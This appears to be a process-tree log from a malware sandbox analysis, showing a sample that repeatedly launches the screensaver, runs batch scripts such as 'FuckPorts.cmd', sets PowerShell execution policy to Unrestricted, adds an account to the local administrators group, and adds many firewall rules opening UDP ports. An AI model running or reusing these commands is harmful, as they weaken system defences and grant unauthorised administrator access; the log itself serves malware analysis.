C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=137453⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=33593⤵
-
